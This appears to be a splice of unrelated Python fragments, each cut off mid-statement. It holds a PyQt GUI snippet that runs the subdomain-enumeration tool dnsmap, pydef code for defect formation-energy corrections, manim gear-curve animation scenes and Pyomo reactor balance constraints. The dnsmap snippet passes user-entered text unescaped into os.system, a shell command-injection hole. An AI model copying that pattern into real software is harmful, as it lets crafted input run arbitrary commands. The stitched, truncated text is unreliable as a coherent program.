os.system("gnome-terminal --window -x dnsmap {} -r output.txt".format(self.lineEdit_site.text().lower()[12:]))
msg2 = QMessageBox()
msg2.setWindowTitle("Information")
msg2.setBaseSize(300,300)
msg2.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg2.setIcon(QMessageBox.Warning)
msg2.setText("Searching subdomains,please wait...")
msg2.exec_()
elif self.lineEdit_site.text().startswith("http://www"):
self.plainTextEdit_result.clear()
self.plainTextEdit_result.insertPlainText("Searching subdomains,please wait...")
os.system("gnome-terminal --window -x dnsmap {} -r output.txt".format(self.lineEdit_site.text().lower()[11:]))
msg2 = QMessageBox()
msg2.setWindowTitle("Information")
msg2.setBaseSize(300,300)
msg2.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg2.setIcon(QMessageBox.Warning)
msg2.setText("Searching subdomains,please wait...")
msg2.exec_()
self.plainTextEdit_result.clear()
elif self.lineEdit_site.text().startswith("www"):
self.plainTextEdit_result.clear()
self.plainTextEdit_result.insertPlainText("Searching subdomains,please wait...")
os.system("gnome-terminal --window -x dnsmap {} | |
<filename>pydef_core/formation_energy_corrections.py
import numpy as np
import pydef_core.figure as pf
import pydef_core.basic_functions as bf
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
def potential_alignment_correction(host_cell, defect_cell, defects, spheres_radius, plotsphere=True, display_atom_name=False):
""" Compute the potential alignment correction by calculating the average difference of electrostatic potentials of atoms
far away from the defects and their images. This is done by considering spheres around the defects and their images with the
same radius. Only the atoms outside these spheres (so at a minimum distance from a defect) are considered.
:param host_cell: Cell object of the host cell calculation
:param defect_cell: Cell object of the defect cell calculation
:param defects: list of Defect objects
:param spheres_radius: radius of the spheres in angstrom (float)
:param plotsphere: if True, then represent the spheres and positions of the atoms
:param display_atom_name: if True, display the name of each atom on the representation """
atoms_pos_d = defect_cell.atoms_positions
atoms_pos_h = host_cell.atoms_positions
potentials_h = host_cell.potentials # electrostatic potentials of the atoms of the host cell
potentials_d = defect_cell.potentials # electrostatic potentials of the atoms of the defect cell
atoms_h = list(host_cell.atoms) # atoms labels of the host cell
atoms_d = list(defect_cell.atoms) # atoms labels of the defect cell
# Positions of the defects and their images
defects_position = [f.set_defect_position(atoms_pos_h, atoms_pos_d) for f in defects] # defects positions
defect_images_positions = [np.dot(host_cell.cell_parameters, f) for f in
[[0, 0, 0], [0, 0, -1], [0, 0, 1], [1, 0, 0],
[-1, 0, 0], [0, -1, 0], [0, 1, 0]]] # relative position of the images of the defects
defects_positions = [[f + g for g in defect_images_positions]
for f in defects_position] # all positions of the defects and their respective images
# Removing useless data
for Defect in defects:
if Defect.defect_type == 'Vacancy':
potentials_h.pop(Defect.atom[0]) # remove the electrostatic potential of the atom removed from the host cell data
atoms_h.remove(Defect.atom[0])
elif Defect.defect_type == 'Interstitial':
potentials_d.pop(Defect.atom[0]) # remove the electrostatic potential of the atom added from the defect cell data
atoms_pos_d.pop(Defect.atom[0]) # remove the position of the corresponding atom so the number of positions and potentials match
atoms_d.remove(Defect.atom[0])
elif Defect.defect_type == 'Substitutional':
potentials_h.pop(Defect.atom[0])
potentials_d.pop(Defect.atom[1])
atoms_pos_d.pop(Defect.atom[1])
atoms_h.remove(Defect.atom[0])
atoms_d.remove(Defect.atom[1])
# Compute the average electrostatic potential outside the spheres
potentials_list_h = [potentials_h[f] for f in atoms_h]
potentials_list_d = [potentials_d[f] for f in atoms_d]
atoms_pos_list_d = [atoms_pos_d[f] for f in atoms_d]
distances = [np.array([bf.distance(f, g) for f in atoms_pos_list_d])
for g in np.concatenate(defects_positions)] # distance of each atom from each defect
min_distances = [min(f) for f in np.transpose(distances)] # minimum distance between an atom and any defect or its image
index_out = [np.where(f > spheres_radius)[0] for f in distances] # index of the atoms outside the spheres which centers are the defects
common_index_out = bf.get_common_values(index_out) # index of the atoms outside all the spheres radius
energy_diff = np.array(potentials_list_d) - np.array(potentials_list_h) # difference of electrostatic energy between the defect and host cells
pot_al = np.mean(energy_diff[common_index_out]) # average electrostatic difference between the defect and host cells taking into account only the atoms outside the spheres
if plotsphere is True:
figure = plt.figure()
ax = figure.add_axes([0.01, 0.1, 0.45, 0.8], projection='3d', aspect='equal')
# Display the spheres and defects
[bf.plot_sphere(spheres_radius, f[0], ax, '-') for f in defects_positions] # spheres around the defects
[[bf.plot_sphere(spheres_radius, f, ax, '--') for f in q[1:]] for q in defects_positions] # spheres around the images of the defects
[[ax.scatter(f[0], f[1], f[2], color='red', s=400, marker='*') for f in q] for q in defects_positions] # Position of the defects objects and images
[[ax.text(f[0], f[1], f[2] + 0.2, s='$' + g.name + '$', ha='center', va='bottom', color='red') for f in q]
for q, g in zip(defects_positions, defects)]
# Atoms positions
atoms_positions = np.transpose(atoms_pos_list_d)
scatterplot = ax.scatter(atoms_positions[0], atoms_positions[1], atoms_positions[2], s=100, c=energy_diff, cmap='hot', depthshade=False)
if display_atom_name is True:
[ax.text(f[0], f[1], f[2], s=g, ha='center', va='bottom') for f, g in zip(atoms_pos_list_d, atoms_d)]
# Plot parameters
ax.set_axis_off()
# X limit is set as the maximum value of the projection of the cristallographic parameters on the x-axe, etc.
ax.set_xlim(0, np.max(np.transpose(defect_cell.cell_parameters)[0]))
ax.set_ylim(0, np.max(np.transpose(defect_cell.cell_parameters)[1]))
ax.set_zlim(0, np.max(np.transpose(defect_cell.cell_parameters)[2]))
# Colorbar
temp1 = figure.get_window_extent()
temp2 = ax.get_window_extent()
ax_cb = figure.add_axes([temp2.x0 / temp1.x1, temp2.y0 / temp1.y1 - 0.04, (temp2.x1 - temp2.x0) / temp1.x1, 0.03])
cb = figure.colorbar(scatterplot, cax=ax_cb, orientation='horizontal')
cb.set_label('$\Delta V\ (eV)$')
return pot_al, figure
else:
return min_distances, energy_diff, pot_al
def plot_potential_alignment(host_cell, defect_cell, defects, spheres_radius, title_plot, display_atom_name=False):
""" Draw 3 plots in a same figure
1) Graphical representation of the positions of the defects and the atoms, and the spheres around the defects
2) Average electrostatic energy difference between defect and host cells as a function of the spheres radius
3) Electrostatic energy difference between defect and host cells between each atom as a function of their minimum distance from a defect
:param host_cell: Cell object of the host cell calculation
:param defect_cell: Cell object of the defect cell calculation
:param defects: list of Defect objects
:param spheres_radius: radius of the spheres in angstrom (float)
:param title_plot: title of the plot
:param display_atom_name: if True, display the name of each atom on the representation
"""
fig = potential_alignment_correction(host_cell, defect_cell, defects, spheres_radius, True, display_atom_name)[1] # plot the spheres and ions
min_distances, energy_diff = potential_alignment_correction(host_cell, defect_cell, defects, spheres_radius, False)[0:2] # minimum distance and potential alignment for each atom
spheres_radii = np.linspace(0, 1, 100) * np.max(defect_cell.cell_parameters)
pot_all = [potential_alignment_correction(host_cell, defect_cell, defects, f, False)[-1] for f in spheres_radii] # mean potential alignment for each spheres radius
# Average electrostatic energy difference between defect and host cells as a function of the spheres radius
ax1 = fig.add_subplot(222)
ax1.plot(spheres_radii, pot_all, 'x', ms=7)
ax1.axvline(spheres_radius, ls='--', c='g') # plot a line corresponding to the current sphere radii value
ax1.set_xlabel(r'Spheres radius $R$ ($\AA$)')
ax1.set_ylabel(r"$\overline{\Delta V(r>R)}$ ($eV$)")
if np.nanmin(pot_all) <= 0:
ax1.set_ylim(bottom=np.round(np.nanmin(pot_all) * 1.1, 2))
else:
ax1.set_ylim(bottom=np.round(np.nanmin(pot_all) * 0.9, 2))
if np.nanmax(pot_all) <= 0:
ax1.set_ylim(top=np.round(np.nanmax(pot_all) * 0.9, 2))
else:
ax1.set_ylim(top=np.round(np.nanmax(pot_all) * 1.1, 2))
# Electrostatic energy difference between defect and host cells between each atom as a function of their minimum distance from a defect
ax2 = fig.add_subplot(224)
ax2.plot(min_distances, energy_diff, 'x', ms=7)
ax2.set_xlabel(r'Distance to the closest defect ($\AA$)')
ax2.set_ylabel(r"$\Delta V(r)$ ($eV$)")
ax2.set_xlim(np.min(min_distances)*0.9, np.max(min_distances)*1.02)
if np.nanmin(energy_diff) <= 0:
ax2.set_ylim(bottom=np.round(np.nanmin(energy_diff) * 1.1, 2))
else:
ax2.set_ylim(bottom=np.round(np.nanmin(energy_diff) * 0.9, 2))
if np.nanmax(energy_diff) <= 0:
ax2.set_ylim(top=np.round(np.nanmax(energy_diff) * 0.9, 2))
else:
ax2.set_ylim(top=np.round(np.nanmax(energy_diff) * 1.1, 2))
fig.suptitle('$' + title_plot.replace(' ', '\ ') + '$', x=0.22)
# fig.tight_layout() # might be removed to solve the non updating 3d plot
fig.show()
# return fig
def get_bands_correction(host_cell, defect_cell, pot_al):
""" Get the number of electrons and holes in the conduction and valence bands with respect to the host cell """
bands_data = defect_cell.bands_data
if defect_cell.ispin == 1:
kpoints_weights = defect_cell.kpoints_weights
max_occupation = 2.
else:
kpoints_weights = list(defect_cell.kpoints_weights / 2.) * 2
max_occupation = 1.
cbm_aligned = host_cell.cbm_energy + pot_al
vbm_aligned = host_cell.vbm_energy + pot_al
nb_electrons = sum([k * sum(f[1] * bf.heaviside(f[0] - cbm_aligned)) for f, k in zip(bands_data, kpoints_weights)])
nb_holes = sum([k * sum((max_occupation - f[1]) * bf.heaviside(vbm_aligned - f[0])) for f, k in zip(bands_data, kpoints_weights)])
e_donnor = - sum([k * sum(f[1] * (f[0] - cbm_aligned) * bf.heaviside(f[0] - cbm_aligned)) for f, k in zip(bands_data, kpoints_weights)])
e_acceptor = - sum([k * sum((max_occupation - f[1]) * (vbm_aligned - f[0]) * bf.heaviside(vbm_aligned - f[0])) for f, k in zip(bands_data, kpoints_weights)])
return e_acceptor, e_donnor, nb_holes, nb_electrons
def band_extrema_correction(host_cell, host_cell_b):
""" Compute the correction of the band extrema computed with a functional (Host_Cell)
in order to retrieve the same gap computed with another functional (Host_Cell_B)
:param host_cell: Cell object of the host cell calculation
:param host_cell_b: Cell object of the host cell calculation (with a different functional) """
de_vbm = host_cell_b.vbm_energy - host_cell.vbm_energy
de_cbm = host_cell_b.cbm_energy - host_cell.cbm_energy
return de_vbm, de_cbm
def phs_correction(z_h, z_e, de_vbm, de_cbm):
""" Compute the PHS correction
:param z_h: number of holes in the PHS
:param z_e: number of electrons in the PHS
:param de_vbm: correction of the VBM
:param de_cbm: correction of the CBM"""
return - z_h * de_vbm, z_e * de_cbm
def vbm_correction(defect_cell, de_vbm):
""" Correction | |
self.play(path.move_to, ORIGIN)
self.play(path.set_height, 7.2, run_time=2)
self.wait(5)
# draw curves without displaying gears and rods
class OnlyCurve(Scene):
CONFIG = {
'camera_config': {
'background_color': WHITE,
},
'gears_config':{
'r1': 3,
'z': [36, 75, 36, 30],
'l': [0.95, 1.25, 0.9, 3.6],
'a': [PI/6, 40 *DEGREES, PI/2],
'w': 10,
},
'step_num': 2000,
'wait_time': 2.5,
'stroke_config': {
'color': BLUE_D,
'width': 1,
},
}
def construct(self):
r1 = self.gears_config['r1']
z = self.gears_config['z']
l = self.gears_config['l']
a = self.gears_config['a']
z0, z1, z2, z3 = z[0], z[1], z[2], z[3]
r0, r2, r3 = r1 * z0 / z1, r1 * z2 / z1, r1 * z3 / z1
center = ORIGIN
# P2A, P3B, CD, AC = 1., 0.72, 1.6, 2.8
P3A, P2B, CD, AC = l[0], l[1], l[2], l[3]
phi_A, phi_B, theta_BCD = a[0], a[1], a[2]
gear_1 = Virtual_Gear(pitch_circle_radius=r1, tooth_hight=0.16, tooth_num=z1, inner_radius=0.3, center=center, stroke_color=BLUE)
gear_0 = Virtual_Gear(pitch_circle_radius=r0, tooth_hight=0.16, tooth_num=z0, inner_radius=0.16, speed=1 * DEGREES,
center=gear_1.center + complex_to_R3((r0+r1) * np.exp(-1j * 15 * DEGREES)), stroke_color=RED)
gear_2 = Virtual_Gear(pitch_circle_radius=r2, tooth_hight=0.16, tooth_num=z2, inner_radius=0.16,
center=gear_1.center + complex_to_R3((r1+r2) * np.exp(1j * 3 * PI/4)), stroke_color=GREEN)
gear_3 = Virtual_Gear(pitch_circle_radius=r3, tooth_hight=0.16, tooth_num=z3, inner_radius=0.16,
center=gear_0.center + complex_to_R3((r0+r3) * np.exp(1j * 75 * DEGREES)), stroke_color=PINK)
gear_1.match_angle(gear_0).match_speed(gear_0)
gear_2.match_angle(gear_1).match_speed(gear_1)
gear_3.match_angle(gear_0).match_speed(gear_0)
dot_A = Dot(gear_3.center + complex_to_R3(P3A * np.exp(1j * phi_A)), color=PINK).scale(0.8)
dot_B = Dot(gear_2.center + complex_to_R3(P2B * np.exp(1j * phi_B)), color=GREEN).scale(0.8)
rect = Rectangle(height=0.4, width=11.5, stroke_width=2, stroke_color=YELLOW) # .round_corners(0.2)
hole = Circle(radius=0.1, stroke_width=2, stroke_color=YELLOW).align_to(rect, LEFT).shift(RIGHT * 0.1)
hole_2 = Dot().set_opacity(0).align_to(rect, RIGHT).shift(LEFT * 0.1)
line_hole = Rectangle(height=0.18, width=10.5, stroke_width=2, stroke_color=YELLOW).align_to(rect, RIGHT).shift(LEFT * 0.11)
rod = VGroup(rect, hole, line_hole, hole_2)
gear_3.add(dot_A), gear_2.add(dot_B)
poly_5 = Polygon([-0.2, 3., 0], [0.2, 3., 0], [0.2, 0, 0], [0, -0.2 * np.sqrt(3), 0], [-0.2, 0, 0],
stroke_width=2, stroke_color=YELLOW) # .round_corners(0.2)
hole_01 = Circle(radius=0.1, stroke_width=2, stroke_color=YELLOW).align_to(poly_5, DOWN).shift(UP * 0.1)
line_hole_01 = Rectangle(height=2.5, width=0.18, stroke_width=2, stroke_color=YELLOW).align_to(poly_5, UP).shift(DOWN * 0.11)
dot_D = Dot(hole_01.get_center(), color=BLUE).scale(0.8)
rod_2 = VGroup(poly_5, hole_01, line_hole_01, dot_D).rotate(PI)
rod_2.shift(hole.get_center()-hole_01.get_center() + AC * RIGHT + CD * UP)
c0 = Circle(radius=0.18, stroke_width=2, stroke_color=YELLOW).shift(hole.get_center()+AC*RIGHT)
c1 = Dot(color=YELLOW).scale(0.85).shift(hole.get_center()+AC*RIGHT)
rods = VGroup(rod, rod_2, VGroup(c0, c1))
def update_rod(r):
r.shift(dot_A.get_center() - hole.get_center())
AB = dot_B.get_center() - dot_A.get_center()
vect_old = hole_2.get_center() - hole.get_center()
r.rotate(np.angle(complex(*AB[:2]))-np.angle(complex(*vect_old[:2])), about_point=hole.get_center())
rods.add_updater(update_rod)
gears = Gear_system(gear_0, gear_1, gear_2, gear_3)
# gears.update_gears()
path = TracedPath(dot_D.get_center, stroke_color=self.stroke_config['color'],
min_distance_to_new_point=0.02, stroke_width=self.stroke_config['width'])
path.add_updater(lambda p: p.rotate(gears.w.get_value() * gear_1.speed, about_point=gear_1.center))
self.add(gears, rods, path)
gears.set_opacity(0)
rods.set_opacity(0)
self.wait(1)
gears.w.set_value(self.gears_config['w'])
self.wait(1/60)
for i in range(self.step_num):
for g in gears:
g.rotate_gear(g.speed * gears.w.get_value())
if i % int(PI * 2 / (gears.w.get_value() * gear_1.speed)) == 0:
self.wait(1/self.camera.frame_rate)
# self.wait(0)
else:
self.wait(0)
print('step_%d' % i, end='\t')
print('frame_%d' % int(abs(i / int(PI * 2 / (gears.w.get_value() * gear_1.speed)))))
self.wait(self.wait_time)
class OnlyCurve_mode01(OnlyCurve):
CONFIG = {}
class OnlyCurve_mode01_2(Scene):
CONFIG = {
'camera_config': {
'background_color': WHITE,
},
'gears_config':{
'r1': 3,
'z': [36, 75, 36, 30],
'l': [0.95, 1.25, 0.9, 3.6],
'a': [PI/6, 40 *DEGREES, PI/2],
'w': 10,
},
'step_num': 2000,
'wait_time': 2.5,
'stroke_config': {
'color': BLUE_D,
'width': 1,
},
}
def construct(self):
r1 = self.gears_config['r1']
z = self.gears_config['z']
l = self.gears_config['l']
a = self.gears_config['a']
z0, z1, z2, z3 = z[0], z[1], z[2], z[3]
r0, r2, r3 = r1 * z0 / z1, r1 * z2 / z1, r1 * z3 / z1
center = ORIGIN
# P2A, P3B, CD, AC = 1., 0.72, 1.6, 2.8
P2A, P3B, CD, AC = l[0], l[1], l[2], l[3]
phi_A, phi_B, theta_BCD = a[0], a[1], a[2]
gear_1 = Virtual_Gear(pitch_circle_radius=r1, tooth_hight=0.16, tooth_num=z1, inner_radius=0.3, center=center, stroke_color=BLUE)
gear_0 = Virtual_Gear(pitch_circle_radius=r0, tooth_hight=0.16, tooth_num=z0, inner_radius=0.16, speed=1 * DEGREES,
center=gear_1.center + complex_to_R3((r0+r1) * np.exp(-1j * 15 * DEGREES)), stroke_color=RED)
gear_2 = Virtual_Gear(pitch_circle_radius=r2, tooth_hight=0.16, tooth_num=z2, inner_radius=0.16,
center=gear_1.center + complex_to_R3((r1+r2) * np.exp(1j * 3 * PI/4)), stroke_color=GREEN)
gear_3 = Virtual_Gear(pitch_circle_radius=r3, tooth_hight=0.16, tooth_num=z3, inner_radius=0.16,
center=gear_0.center + complex_to_R3((r0+r3) * np.exp(1j * 75 * DEGREES)), stroke_color=PINK)
gear_1.match_angle(gear_0).match_speed(gear_0)
gear_2.match_angle(gear_1).match_speed(gear_1)
gear_3.match_angle(gear_0).match_speed(gear_0)
dot_A = Dot(gear_2.center + complex_to_R3(P2A * np.exp(1j * phi_A)), color=GREEN).scale(0.8)
dot_B = Dot(gear_3.center + complex_to_R3(P3B * np.exp(1j * phi_B)), color=PINK).scale(0.8)
rect = Rectangle(height=0.4, width=11, stroke_width=2, stroke_color=YELLOW).round_corners(0.2)
hole = Circle(radius=0.1, stroke_width=2, stroke_color=YELLOW).align_to(rect, LEFT).shift(RIGHT * 0.1)
hole_2 = Dot().set_opacity(0).align_to(rect, RIGHT).shift(LEFT * 0.1)
line_hole = Rectangle(height=0.18, width=10, stroke_width=2, stroke_color=YELLOW).round_corners(0.09).align_to(rect, RIGHT).shift(LEFT * 0.11)
rod = VGroup(rect, hole, line_hole, hole_2)
gear_2.add(dot_A), gear_3.add(dot_B)
poly_5 = Polygon([-0.2, 3., 0], [0.2, 3., 0], [0.2, 0, 0], [0, -0.2 * np.sqrt(3), 0], [-0.2, 0, 0],
stroke_width=2, stroke_color=YELLOW).round_corners(0.2)
hole_01 = Circle(radius=0.1, stroke_width=2, stroke_color=YELLOW).align_to(poly_5, DOWN).shift(UP * 0.1)
line_hole_01 = Rectangle(height=2.5, width=0.18, stroke_width=2, stroke_color=YELLOW).round_corners(0.09).align_to(poly_5, UP).shift(DOWN * 0.11)
dot_D = Dot(hole_01.get_center(), color=BLUE).scale(0.8)
rod_2 = VGroup(poly_5, hole_01, line_hole_01, dot_D)
rod_2.shift(hole.get_center()-hole_01.get_center() + AC * RIGHT + CD * DOWN)
c0 = Circle(radius=0.18, stroke_width=2, stroke_color=YELLOW).shift(hole.get_center()+AC*RIGHT)
c1 = Dot(color=YELLOW).scale(0.85).shift(hole.get_center()+AC*RIGHT)
rods = VGroup(rod, rod_2, VGroup(c0, c1))
def update_rod(r):
r.shift(dot_A.get_center() - hole.get_center())
AB = dot_B.get_center() - dot_A.get_center()
vect_old = hole_2.get_center() - hole.get_center()
r.rotate(np.angle(complex(*AB[:2]))-np.angle(complex(*vect_old[:2])), about_point=hole.get_center())
rods.add_updater(update_rod)
gears = Gear_system(gear_0, gear_1, gear_2, gear_3)
# gears.update_gears()
path = TracedPath(dot_D.get_center, stroke_color=self.stroke_config['color'],
min_distance_to_new_point=0.02, stroke_width=self.stroke_config['width'])
path.add_updater(lambda p: p.rotate(gears.w.get_value() * gear_1.speed, about_point=gear_1.center))
self.add(gears, rods, path)
gears.set_opacity(0)
rods.set_opacity(0)
self.wait(1)
gears.w.set_value(self.gears_config['w'])
self.wait(1/60)
for i in range(self.step_num):
for g in gears:
g.rotate_gear(g.speed * gears.w.get_value())
if i % int(PI * 2 / (gears.w.get_value() * gear_1.speed)) == 0:
self.wait(1/self.camera.frame_rate)
# self.wait(0)
else:
self.wait(0)
print('step_%d' % i, end='\t')
print('frame_%d' % int(abs(i / int(PI * 2 / (gears.w.get_value() * gear_1.speed)))))
self.wait(self.wait_time)
class OnlyCurve_mode02(Scene):
CONFIG = {
'camera_config': {
'background_color': WHITE,
},
'gears_config':{
'r1': 3,
'z': [36, 75, 36, 45],
'l': [1.5, 1.25, 0.9, 3.6],
'a': [PI/6, 40 *DEGREES, PI/2],
'w': 10,
},
'step_num': 2000,
'wait_time': 2.5,
'stroke_config': {
'color': BLUE_D,
'width': 1,
},
}
def construct(self):
r1 = self.gears_config['r1']
z = self.gears_config['z']
l = self.gears_config['l']
a = self.gears_config['a']
z0, z1, z2, z3 = z[0], z[1], z[2], z[3]
r0, r2, r3 = r1 * z0 / z1, r1 * z2 / z1, r1 * z3 / z1
center = ORIGIN
# P2A, P3B, CD, AC = 1., 0.72, 1.6, 2.8
P3A, P2B, CD, AC = l[0], l[1], l[2], l[3]
phi_A, phi_B, theta_BCD = a[0], a[1], a[2]
gear_1 = Virtual_Gear(pitch_circle_radius=r1, tooth_hight=0.16, tooth_num=z1, inner_radius=0.3, center=center, stroke_color=BLUE)
gear_0 = Virtual_Gear(pitch_circle_radius=r0, tooth_hight=0.16, tooth_num=z0, inner_radius=0.16, speed=1 * DEGREES,
center=gear_1.center + complex_to_R3((r0+r1) * np.exp(-1j * 15 * DEGREES)), stroke_color=RED)
gear_2 = Virtual_Gear(pitch_circle_radius=r2, tooth_hight=0.16, tooth_num=z2, inner_radius=0.16,
center=gear_1.center + complex_to_R3((r1+r2) * np.exp(1j * 150 * DEGREES)), stroke_color=GREEN)
# gear_3 is different from mode_01
gear_3 = Virtual_Gear(pitch_circle_radius=r3, tooth_hight=0.16, tooth_num=z3, inner_radius=0.16,
center=gear_1.center + complex_to_R3((r1+r3) * np.exp(1j * 45 * DEGREES)), stroke_color=PINK)
gear_1.match_angle(gear_0).match_speed(gear_0)
gear_2.match_angle(gear_1).match_speed(gear_1)
gear_3.match_angle(gear_0).match_speed(gear_0)
dot_A = Dot(gear_3.center + complex_to_R3(P3A * np.exp(1j * phi_A)), color=PINK).scale(0.8)
dot_B = Dot(gear_2.center + complex_to_R3(P2B * np.exp(1j * phi_B)), color=GREEN).scale(0.8)
rect = Rectangle(height=0.4, width=11.5, stroke_width=2, stroke_color=YELLOW) # .round_corners(0.2)
hole = Circle(radius=0.1, stroke_width=2, stroke_color=YELLOW).align_to(rect, LEFT).shift(RIGHT * 0.1)
hole_2 = Dot().set_opacity(0).align_to(rect, RIGHT).shift(LEFT * 0.1)
line_hole = Rectangle(height=0.18, width=10.5, stroke_width=2, stroke_color=YELLOW).align_to(rect, RIGHT).shift(LEFT * 0.11)
rod = VGroup(rect, hole, line_hole, hole_2)
gear_3.add(dot_A), gear_2.add(dot_B)
poly_5 = Polygon([-0.2, 3., 0], [0.2, 3., 0], [0.2, 0, 0], [0, -0.2 * np.sqrt(3), 0], [-0.2, 0, 0],
stroke_width=2, stroke_color=YELLOW) # .round_corners(0.2)
hole_01 = Circle(radius=0.1, stroke_width=2, stroke_color=YELLOW).align_to(poly_5, DOWN).shift(UP * 0.1)
line_hole_01 = Rectangle(height=2.5, width=0.18, stroke_width=2, stroke_color=YELLOW).align_to(poly_5, UP).shift(DOWN * 0.11)
dot_D = Dot(hole_01.get_center(), color=BLUE).scale(0.8)
rod_2 = VGroup(poly_5, hole_01, line_hole_01, dot_D).rotate(PI)
rod_2.shift(hole.get_center()-hole_01.get_center() + AC * RIGHT + CD * UP)
c0 = Circle(radius=0.18, stroke_width=2, stroke_color=YELLOW).shift(hole.get_center()+AC*RIGHT)
c1 = Dot(color=YELLOW).scale(0.85).shift(hole.get_center()+AC*RIGHT)
rods = VGroup(rod, rod_2, VGroup(c0, c1))
def update_rod(r):
r.shift(dot_A.get_center() - hole.get_center())
AB = dot_B.get_center() - dot_A.get_center()
vect_old = hole_2.get_center() - hole.get_center()
r.rotate(np.angle(complex(*AB[:2]))-np.angle(complex(*vect_old[:2])), about_point=hole.get_center())
rods.add_updater(update_rod)
gears = Gear_system(gear_0, gear_1, gear_2, gear_3)
# gears.update_gears()
path = TracedPath(dot_D.get_center, stroke_color=self.stroke_config['color'],
min_distance_to_new_point=0.02, stroke_width=self.stroke_config['width'])
path.add_updater(lambda p: p.rotate(gears.w.get_value() * gear_1.speed, about_point=gear_1.center))
self.add(gears, rods, path)
gears.set_opacity(0)
rods.set_opacity(0)
self.wait(1)
gears.w.set_value(self.gears_config['w'])
self.wait(1/60)
for i in range(self.step_num):
for g in gears:
g.rotate_gear(g.speed * gears.w.get_value())
if i % int(PI * 2 / (gears.w.get_value() * gear_1.speed)) == 0:
self.wait(1/self.camera.frame_rate)
# self.wait(0)
else:
self.wait(0)
print('step_%d' % i, end='\t')
print('frame_%d' % int(abs(i / int(PI * 2 / (gears.w.get_value() * gear_1.speed)))))
self.wait(self.wait_time)
class Curve_1(OnlyCurve):
CONFIG = {
'gears_config':{
'r1': 3.2,
'z': [36, 75, 37, 30],
'l': [1, 1.2, 1, 3.6],
'a': [PI/6, 36 *DEGREES, PI/2],
'w': 10/4,
},
'step_num': 3330 * 2 * 4,
'wait_time': 5,
}
class Curve_1_02(OnlyCurve):
CONFIG = {
'gears_config':{
'r1': 3.2 * 1.1,
'z': [36, 75, 37, 30],
'l': np.array([0.9, 1., 1.2, 3.6]) * 1.1,
'a': [PI/6, 36 *DEGREES, PI/2],
'w': 10,
},
'step_num': 3330 * 2,
'wait_time': 5,
}
class | |
== (1 - self.Gas_M[1,'CH4',t]/self.Gas_M[0,'CH4',t])
#self.eq_c8 = Constraint(expr=self.X_gas ==
# (1 - self.Gas_M[1,'CH4']/self.Gas_M[0,'CH4']),
# doc = 'Conversion of gas fuel')
self.eq_c8 = Constraint(self.t, rule=rule_eq_c8,
doc = 'Conversion of gas fuel')
# ^ specifies X_gas from molar flow rates
def rule_eq_c18(b,z,t):
return b.CgT[z,t] == sum( b.Cg[z,j,t] for j in b.GasList )
self.eq_c18 = Constraint(self.z, self.t, rule=rule_eq_c18)
# if c18 is active, one of c3, c4, or c5 should be deactivated (probable c5)
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Calculate the total and component SOLID mass flow rates
def rule_eq_c9(b,z,j,t):
return b.Solid_M[z,j,t] == b.A_bed*b.S_flux[z,j,t]
self.eq_c9 = Constraint(self.z,self.SolidList,self.t,rule=rule_eq_c9,
doc = 'Solid component mass flow rate')
# ^ specifies Solid_M from flux (differential)
def rule_eq_c10(b,z,t):
return b.Solid_M_total[z,t] == sum(b.Solid_M[z,j,t] \
for j in b.SolidList)
self.eq_c10 = Constraint(self.z, self.t, rule=rule_eq_c10,
doc = 'Total mass flow rate of solid')
# ^ specifies Solid_M_total
def rule_eq_c11(b,z,j,t):
return b.Solid_F[z,j,t]*(b.MW[j]*1e-3) == b.Solid_M[z,j,t]
self.eq_c11 = Constraint(self.z, self.SolidList, self.t, rule=rule_eq_c11,
doc = 'Solid component mole flow rate')
# specifies Solid_F from mass flow rate
def rule_eq_c12(b,z,t):
return b.Solid_F_total[z,t] == sum(b.Solid_F[z,j,t] \
for j in b.SolidList)
self.eq_c12 = Constraint(self.z, self.t, rule=rule_eq_c12,
doc = 'Total mole flow rate of solid')
# ^ specifies total molar flow rate
# Calculate the solid components loading
def rule_eq_c13(b,z,j,t):
return b.q[z,j,t]*(1e-3*b.vs[t]) == b.S_flux[z,j,t]
self.eq_c13 = Constraint(self.z, self.SolidList, self.t, rule=rule_eq_c13,
doc = 'Solid components loading')
# specifies q from vs & flux
# or, alternatively, specifies S_flux from q and vs (constant)
# Total solid loading [kg/m3]
def rule_eq_c14(b, z, t):
return b.qT[z,t] == sum(b.q[z,j,t] for j in b.SolidList)
self.eq_c14 = Constraint(self.z, self.t, rule=rule_eq_c14,
doc = 'Total solid loading')
# ^ specifies total solid loading
# Calculate the solid phase mass fractions
def rule_eq_c15(b, z, j, t):
return b.x[z,j,t]*b.qT[z,t] == b.q[z,j,t]
self.eq_c15 = Constraint(self.z, self.SolidList, self.t, rule=rule_eq_c15,
doc = 'Solid component mass fractions')
# ^ specifies x from densities
def rule_eq_c16(b,z,t):
return b.xtot[z,t] == sum(b.x[z,j,t] for j in b.SolidList)
self.eq_c16 = Constraint(self.z, self.t, rule=rule_eq_c16,
doc = 'Total mass fraction of solid')
# ^ specifies xtot
# is it not just 1? ... why is this not redundant...?
# exist components not in the solidlist?
def rule_eq_c17(b,t):
return b.X_OC[t] == 1 - self.Solid_M[0,'Fe2O3',t]/self.Solid_M[1,'Fe2O3',t]
#self.eq_c17 = Constraint(expr=self.X_OC ==
# 1 - self.Solid_M[0,'Fe2O3']/self.Solid_M[1,'Fe2O3'],
# doc = 'Oxygen carrier conversion')
self.eq_c17 = Constraint(self.t, rule=rule_eq_c17,
doc = 'Oxygen carrier conversion')
# ^ specifies X_OC
#==========================================================================
def _energy_balance(self):
"""
Add the energy balance constraints.
"""
def rule_eq_d1(b, z, t):
if z == b.z.first():
return Constraint.Skip #The BC for Tg is under '_make_bdry_conds'
else:
return b.cont_param*b.eps*b.L*b.rho_vap[z,t]*b.cp_gas[z,t]*b.dTgdt[z,t] == \
- b.dGh_fluxdz[z,t] \
- b.Tg_GS[z,t]*b.L - b.Tg_GW[z,t]*b.L \
- b.Tg_refractory[z,t]*b.L
self.eq_d1 = Constraint(self.z, self.t, rule=rule_eq_d1,
doc = 'Gas phase energy balance')
# specifies dTgdt. 1e-6 is not a unit conversion...
def rule_eq_d2(b, z, t):
return b.Gh_flux[z,t] \
== b.rho_vap[z,t]*b.vg[z,t]*b.Tg[z,t]*b.cp_gas[z,t]
self.eq_d2 = Constraint(self.z, self.t, rule=rule_eq_d2,
doc = 'Gas phase enthalpy flux')
# specifies Gh_flux from Tg (differential)
def rule_eq_d3(b, z, t):
return b.Tg_GS[z,t]*b.dp == b.tuning_param2 \
